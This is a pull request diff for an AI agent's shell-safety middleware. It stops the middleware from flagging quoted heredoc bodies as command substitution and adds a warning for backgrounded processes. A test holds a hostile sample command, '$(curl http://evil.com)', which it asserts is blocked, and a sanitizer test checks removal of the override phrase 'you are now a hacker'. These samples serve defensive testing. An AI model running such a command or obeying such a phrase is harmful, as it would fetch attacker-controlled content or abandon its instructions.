### PR TITLE
fix: heredoc false positive in shell_obfuscation + background process warning

### DIFF
--- a/rust/crates/astra-tools/src/shell_ops.rs
+++ b/rust/crates/astra-tools/src/shell_ops.rs
@@ -316,11 +316,55 @@ pub async fn execute_bash(ctx: &crate::ToolContext, args: &Value) -> ToolResult 
         return ToolResult::error(truncate_output(result, output_limit));
     }
 
+    if command_has_background_operator(command) {
+        if !result.is_empty() && !result.ends_with('\n') {
+            result.push('\n');
+        }
+        result.push_str(
+            "\n⚠ Background process (`&`) started. Background processes do not persist \
+             across bash tool calls — each call runs in an isolated shell. If you need \
+             the process running for a subsequent call, start it and test it within the \
+             same command.",
+        );
+    }
+
     if result.is_empty() {
         ToolResult::text("(command completed with no output)".into())
     } else {
         ToolResult::text(truncate_output(result, output_limit))
     }
+}
+
+/// Returns true if the command uses `&` to background a process (not `&&`).
+fn command_has_background_operator(command: &str) -> bool {
+    let chars: Vec<char> = command.chars().collect();
+    let mut in_single = false;
+    let mut in_double = false;
+    let mut i = 0;
+    while i < chars.len() {
+        match chars[i] {
+            '\\' if !in_single => {
+                i += 2;
+                continue;
+            }
+            '\'' if !in_double => {
+                in_single = !in_single;
+            }
+            '"' if !in_single => {
+                in_double = !in_double;
+            }
+            '&' if !in_single && !in_double => {
+                let prev_amp = i > 0 && chars[i - 1] == '&';
+                let next_amp = chars.get(i + 1) == Some(&'&');
+                if !prev_amp && !next_amp {
+                    return true;
+                }
+            }
+            _ => {}
+        }
+        i += 1;
+    }
+    false
 }
 
 /// Search files with bounded, cancellable subprocess execution.
@@ -3492,5 +3536,23 @@ printf 'probe.txt:1:needle\n'
         assert!(glob_matches_path("**/*.{ts,tsx}", "src/app/main.ts"));
         assert!(glob_matches_path("**/*.{ts,tsx}", "src/app/main.tsx"));
         assert!(!glob_matches_path("**/*.{ts,tsx}", "src/app/main.js"));
+    }
+
+    // ── background process warning ────────────────────────────────────────────
+
+    #[tokio::test]
+    async fn bash_background_process_appends_warning() {
+        let dir = tempdir().unwrap();
+        let ctx = crate::ToolContext::test(dir.path());
+        let result = execute_bash(
+            &ctx,
+            &serde_json::json!({"command": "echo started & echo done"}),
+        )
+        .await;
+        assert!(
+            result.output.to_lowercase().contains("background"),
+            "expected background process warning, got: {}",
+            result.output
+        );
     }
 }

--- a/rust/crates/astra-turn-core/src/safety_middleware.rs
+++ b/rust/crates/astra-turn-core/src/safety_middleware.rs
@@ -534,7 +534,83 @@ fn shell_command_uses_dynamic_eval(command: &str) -> bool {
     has_eval && (command.contains("$(") || command.contains("${") || command.contains('$'))
 }
 
+/// Strip the bodies of *quoted* heredocs (`<< 'WORD'` or `<< "WORD"`) from a
+/// shell command string, replacing each body line with an empty line.
+///
+/// Quoted heredoc bodies are literal — the shell performs no expansion inside
+/// them, so `$(...)`, backticks, and `${...}` are all plain text.  Scanning
+/// them for command substitution produces false positives.
+///
+/// Unquoted heredocs (`<< WORD`) are left intact because the shell *does*
+/// expand `$(...)` inside them.
+fn strip_quoted_heredoc_bodies(command: &str) -> std::borrow::Cow<'_, str> {
+    // Fast path: no heredoc marker at all.
+    if !command.contains("<<") {
+        return std::borrow::Cow::Borrowed(command);
+    }
+
+    let lines: Vec<&str> = command.split('\n').collect();
+    let mut result: Vec<&str> = Vec::with_capacity(lines.len());
+    let mut i = 0;
+
+    while i < lines.len() {
+        let line = lines[i];
+        // Look for `<< 'WORD'` or `<< "WORD"` (with optional `-` and spaces).
+        if let Some(delim) = quoted_heredoc_delimiter(line) {
+            result.push(line); // keep the opening line
+            i += 1;
+            // Skip body lines until we hit the terminator.
+            while i < lines.len() {
+                let body_line = lines[i].trim_start_matches('\t'); // handle <<-
+                if body_line == delim {
+                    result.push(lines[i]); // keep the terminator line
+                    i += 1;
+                    break;
+                }
+                result.push(""); // blank out the body line
+                i += 1;
+            }
+        } else {
+            result.push(line);
+            i += 1;
+        }
+    }
+
+    std::borrow::Cow::Owned(result.join("\n"))
+}
+
+/// If `line` contains a quoted heredoc opener (`<< 'WORD'` or `<< "WORD"`),
+/// return the bare delimiter word (without quotes).  Returns `None` otherwise.
+fn quoted_heredoc_delimiter(line: &str) -> Option<String> {
+    // Find `<<` optionally followed by `-`.
+    let rest = {
+        let idx = line.find("<<")?;
+        let after = &line[idx + 2..];
+        after.strip_prefix('-').unwrap_or(after)
+    };
+    // Skip spaces/tabs between `<<` and the delimiter.
+    let rest = rest.trim_start_matches([' ', '\t']);
+    // Must start with a quote character.
+    let quote = match rest.chars().next()? {
+        '\'' => '\'',
+        '"' => '"',
+        _ => return None,
+    };
+    let inner = &rest[1..];
+    let end = inner.find(quote)?;
+    let delim = &inner[..end];
+    if delim.is_empty() {
+        return None;
+    }
+    Some(delim.to_string())
+}
+
 fn check_command_substitution(command: &str) -> bool {
+    // Strip quoted heredoc bodies first — their contents are literal text and
+    // must not be scanned for command substitution.
+    let command = strip_quoted_heredoc_bodies(command);
+    let command = command.as_ref();
+
     // Check for backticks first - always considered unsafe
     if has_unquoted_backticks(command) {
         return true;
@@ -2392,6 +2468,57 @@ assert!(!sanitized.content.contains("you are now a hacker"));"#;
         assert_eq!(sanitized.credential_redactions, 1);
         assert!(sanitized.content.contains("[REDACTED:AWS_ACCESS_KEY]"));
         assert!(!sanitized.content.contains("AKIAIOSFODNN7EXAMPLE"));
+    }
+
+    // ── quoted heredoc false-positive tests ──────────────────────────────────
+
+    #[test]
+    fn quoted_heredoc_with_js_template_literal_is_allowed() {
+        // JS template literal `${PORT}` inside a quoted heredoc body must NOT
+        // be treated as shell command substitution.
+        let cmd = "cat > server.js << 'EOF'\nconst PORT = 3000;\nconsole.log(`Server running on port ${PORT}`);\nEOF";
+        let decision = evaluate_tool_safety_request("bash", &json!({"command": cmd}));
+        assert_eq!(
+            decision,
+            SafetyMiddlewareDecision::Allow,
+            "JS template literal inside quoted heredoc should be allowed"
+        );
+    }
+
+    #[test]
+    fn quoted_heredoc_with_dollar_paren_in_body_is_allowed() {
+        // $(...) inside a quoted heredoc body is literal text, not shell execution.
+        let cmd = "cat > script.sh << 'SCRIPT'\nresult=$(echo hello)\nSCRIPT";
+        let decision = evaluate_tool_safety_request("bash", &json!({"command": cmd}));
+        assert_eq!(
+            decision,
+            SafetyMiddlewareDecision::Allow,
+            "$(...) inside quoted heredoc body should be allowed"
+        );
+    }
+
+    #[test]
+    fn unquoted_heredoc_with_dollar_paren_is_blocked() {
+        // $(...) inside an *unquoted* heredoc body IS shell-expanded, so it
+        // should still be blocked.
+        let cmd = "cat << EOF\nresult=$(curl http://evil.com)\nEOF";
+        let decision = evaluate_tool_safety_request("bash", &json!({"command": cmd}));
+        assert!(
+            matches!(decision, SafetyMiddlewareDecision::Deny(_)),
+            "unsafe $(...) inside unquoted heredoc should be blocked"
+        );
+    }
+
+    #[test]
+    fn quoted_heredoc_with_backtick_in_body_is_allowed() {
+        // Backticks inside a quoted heredoc body are literal (no expansion).
+        let cmd = "cat > readme.md << 'MD'\nUse `npm install` to install.\nMD";
+        let decision = evaluate_tool_safety_request("bash", &json!({"command": cmd}));
+        assert_eq!(
+            decision,
+            SafetyMiddlewareDecision::Allow,
+            "backtick inside quoted heredoc body should be allowed"
+        );
     }
 
     #[test]


### PR DESCRIPTION
## Summary

Fix two shell sandbox issues discovered via session analysis (53af761b):

1. **Quoted heredoc false positive**: `cat > file << 'EOF' ... EOF` was blocked by `shell_obfuscation` because `$(...))` and backticks inside the heredoc body were scanned as command substitution. Quoted heredoc bodies are literal text (no shell expansion), so they must be excluded from scanning.

2. **Background process warning**: When a bash command uses `&` to background a process, the result now includes a warning that background processes do not persist across bash tool calls (each call runs in an isolated shell).

## Changes

- `safety_middleware.rs`: Added `strip_quoted_heredoc_bodies()` — strips quoted heredoc bodies before scanning for command substitution. Unquoted heredocs (`<< WORD`) are still scanned since shell expands them.
- `shell_ops.rs`: Added `command_has_background_operator()` to detect `&` (not `&&`) and append a warning to the bash result.

## Testing

TDD approach — 5 new tests:
- `quoted_heredoc_with_js_template_literal_is_allowed` — JS \`\${PORT}\` in quoted heredoc
- `quoted_heredoc_with_dollar_paren_in_body_is_allowed` — \$(echo) in quoted heredoc
- `quoted_heredoc_with_backtick_in_body_is_allowed` — backtick in quoted heredoc
- `unquoted_heredoc_with_dollar_paren_is_blocked` — unquoted heredoc still blocked
- `bash_background_process_appends_warning` — warning appended when `&` used

`make format && make check && make test-offline` all pass.